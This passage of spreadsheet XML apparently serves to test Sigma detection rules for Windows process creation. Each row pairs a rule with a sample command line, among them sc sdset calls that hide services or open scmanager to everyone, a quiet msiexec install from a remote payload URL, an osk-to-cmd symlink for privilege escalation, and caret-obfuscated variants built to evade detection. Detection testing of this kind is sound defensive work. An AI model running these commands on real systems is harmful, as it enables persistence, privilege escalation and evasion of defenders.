      <c r="H715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I715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715" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K715" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C716" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D716" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E716" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DC;;;IU)(D;;LC;;;IU)(D;;WP;;;IU)(D;;DT;;;IU)(D;;SD;;;IU)</t>
        </is>
      </c>
      <c r="F716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I716" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J716" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K716" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C717" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D717" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E717" s="44" t="inlineStr">
        <is>
          <t>sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)</t>
        </is>
      </c>
      <c r="F717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I717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17" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K717" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C718" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D718" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E718" s="44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718" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I718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718" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K718" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C719" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D719" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E719" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F719" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I719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19" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K719" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C720" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D720" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E720" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /i http://example.com/payload.msi /qn</t>
        </is>
      </c>
      <c r="F720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I720" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J720" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K720" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C721" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D721" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E721" s="44" t="inlineStr">
        <is>
          <t>msiexec.exe /i http://example.com/payload.msi /quiet</t>
        </is>
      </c>
      <c r="F721" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G721" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I721" s="44" t="inlineStr">
        <is>
          <t>Msiexec Quiet Installation (79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5); Suspicious Msiexec Quiet Install From Remote Location (8150732a-0c9d-4a99-82b9-9efb9b90c40c)</t>
        </is>
      </c>
      <c r="J721" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C722" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D722" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E722" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe -sta "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"</t>
        </is>
      </c>
      <c r="F722" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I722" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects (f1edd233-30b5-4823-9e6a-c4171b24d316); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J722" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_tool_recon</t>
        </is>
      </c>
      <c r="C723" s="44" t="inlineStr">
        <is>
          <t>Webshell Tool Reconnaissance Activity</t>
        </is>
      </c>
      <c r="D723" s="44" t="inlineStr">
        <is>
          <t>f64e5c19-879c-4bae-b471-6d84c8339677</t>
        </is>
      </c>
      <c r="E723" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "p^y^t^h^o^n -h"</t>
        </is>
      </c>
      <c r="F723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I723" s="44" t="n"/>
      <c r="J723" s="44" t="n"/>
      <c r="K723" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="44" t="inlineStr">
        <is>
          <t>t1546.001</t>
        </is>
      </c>
      <c r="B724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_assoc_execution</t>
        </is>
      </c>
      <c r="C724" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc</t>
        </is>
      </c>
      <c r="D724" s="44" t="inlineStr">
        <is>
          <t>3d3aa6cd-6272-44d6-8afc-7e88dfef7061</t>
        </is>
      </c>
      <c r="E724" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set ASSOC_CMD=assoc&amp;&amp; call %ASSOC_CMD% .hta=txtfile"</t>
        </is>
      </c>
      <c r="F724" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I724" s="44" t="inlineStr">
        <is>
          <t>Change Default File Association Via Assoc (3d3aa6cd-6272-44d6-8afc-7e88dfef7061)</t>
        </is>
      </c>
      <c r="J724" s="44" t="n"/>
      <c r="K724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="44" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B725" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C725" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D725" s="44" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E725" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "netsh.exe ad^d helper "C:\AtomicRedTeam\atomics\T1546.007_x0008_in\NetshHelper.dll""</t>
        </is>
      </c>
      <c r="F725" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I725" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL (56321594-9087-49d9-bf10-524fe8479452)</t>
        </is>
      </c>
      <c r="J725" s="44" t="n"/>
      <c r="K725" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C726" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D726" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E726" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\rundll32.exe" -st^a {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F726" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I726" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects (f1edd233-30b5-4823-9e6a-c4171b24d316); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J726" s="44" t="n"/>
      <c r="K726" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C727" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D727" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E727" s="44" t="inlineStr">
        <is>
          <t>cmd /c "m""klink C:\Windows\System32\osk.exe C:\Windows\System32\cmd.exe"</t>
        </is>
      </c>
      <c r="F727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I727" s="44" t="n"/>
      <c r="J727" s="44" t="n"/>
      <c r="K727" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_osk_cmd</t>
        </is>
      </c>
      <c r="C728" s="44" t="inlineStr">
        <is>
          <t>Potential Privilege Escalation Using Symlink Between Osk and Cmd</t>
        </is>
      </c>
      <c r="D728" s="44" t="inlineStr">
        <is>
          <t>e9b61244-893f-427c-b287-3e708f321c6b</t>
        </is>
      </c>
      <c r="E728" s="44" t="inlineStr">
        <is>
          <t>cmd /c mklink %windir%\System32\osk.exe %windir%\System32\cmd."","exe</t>
        </is>
      </c>
      <c r="F728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I728" s="44" t="n"/>
      <c r="J728" s="44" t="n"/>
      <c r="K728" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C729" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D729" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E729" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" /localserver {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I729" s="44" t="n"/>
      <c r="J729" s="44" t="n"/>
      <c r="K729" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C730" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D730" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E730" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" "-sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I730" s="44" t="n"/>
      <c r="J730" s="44" t="n"/>
      <c r="K730" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="44" t="n"/>
      <c r="B731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mssql_veaam_susp_child_processes</t>
        </is>
      </c>
      <c r="C731" s="44" t="inlineStr">
        <is>
          <t>Suspicious Child Process Of Veeam Dabatase</t>
        </is>
      </c>
      <c r="D731" s="44" t="inlineStr">
        <is>
          <t>d55b793d-f847-4eea-b59a-5ab09908ac90</t>
        </is>
      </c>
      <c r="E731" s="44" t="n"/>
      <c r="F731" s="44" t="n"/>
      <c r="G731" s="44" t="n"/>
      <c r="H731" s="44" t="n"/>
      <c r="I731" s="44" t="n"/>
      <c r="J731" s="44" t="n"/>
      <c r="K731" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="44" t="n"/>
      <c r="B732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_windows_terminal_susp_children</t>
        </is>
      </c>
      <c r="C732" s="44" t="inlineStr">
        <is>
          <t>Suspicious WindowsTerminal Child Processes</t>
        </is>
      </c>
      <c r="D732" s="44" t="inlineStr">
        <is>
          <t>8de89e52-f6e1-4b5b-afd1-41ecfa300d48</t>
        </is>
      </c>
      <c r="E732" s="44" t="n"/>
      <c r="F732" s="44" t="n"/>
      <c r="G732" s="44" t="n"/>
      <c r="H732" s="44" t="n"/>
      <c r="I732" s="44" t="n"/>
      <c r="J732" s="44" t="n"/>
      <c r="K732" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C733" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D733" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E733" s="44" t="inlineStr">
        <is>
          <t>secedit.exe -export /areas SECURITYPOLICY -cfg output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I733" s="44" t="n"/>
      <c r="J733" s="44" t="n"/>
      <c r="K733" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C734" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D734" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E734" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c e^cho. &gt; C:\Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I734" s="44" t="n"/>
      <c r="J734" s="44" t="n"/>
      <c r="K734" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C735" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D735" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E735" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe UWhRCAAAAABAAA""AA</t>
        </is>
      </c>
      <c r="F735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I735" s="44" t="n"/>
      <c r="J735" s="44" t="n"/>
      <c r="K735" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C736" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D736" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E736" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle 1 C:\script.ps1</t>
        </is>
      </c>
      <c r="F736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I736" s="44" t="n"/>
      <c r="J736" s="44" t="n"/>
      <c r="K736" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C737" s="44" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D737" s="44" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E737" s="44" t="inlineStr">
        <is>
          <t>certutil.exe -urlcache -f -decode="" C:\encoded.txt C:\decoded.exe</t>
        </is>
      </c>
      <c r="F737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I737" s="44" t="n"/>
      <c r="J737" s="44" t="n"/>
      <c r="K737" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C738" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D738" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E738" s="44" t="inlineStr">
        <is>
          <t>ping.exe /n 4 127.0.0.1</t>
        </is>
      </c>
      <c r="F738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I738" s="44" t="n"/>
      <c r="J738" s="44" t="n"/>
      <c r="K738" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="739" ht="15.75" customHeight="1" s="42">
      <c r="A739" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C739" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D739" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E739" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d" C:\Windows</t>
        </is>
      </c>
      <c r="F739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I739" s="44" t="n"/>
      <c r="J739" s="44" t="n"/>
      <c r="K739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="15.75" customHeight="1" s="42">
      <c r="A740" s="44" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C740" s="44" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D740" s="44" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E740" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w 1 -c "Write-Output 'Webshell Test'"</t>
        </is>
      </c>
      <c r="F740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I740" s="44" t="n"/>
      <c r="J740" s="44" t="n"/>
      <c r="K740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="741" ht="15.75" customHeight="1" s="42">
      <c r="A741" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C741" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D741" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E741" s="44" t="inlineStr">
        <is>
          <t>sc.exe "config" "binpath"= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I741" s="44" t="n"/>
      <c r="J741" s="44" t="n"/>
      <c r="K741" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="742" ht="15.75" customHeight="1" s="42">
      <c r="A742" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C742" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D742" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E742" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe c^onfig b^inPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I742" s="44" t="n"/>
      <c r="J742" s="44" t="n"/>
      <c r="K742" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="743" ht="15.75" customHeight="1" s="42">
      <c r="A743" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C743" s="44" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D743" s="44" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E743" s="44" t="inlineStr">
        <is>
          <t>sc.exe config service_name binPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H743" s="44" t="b">
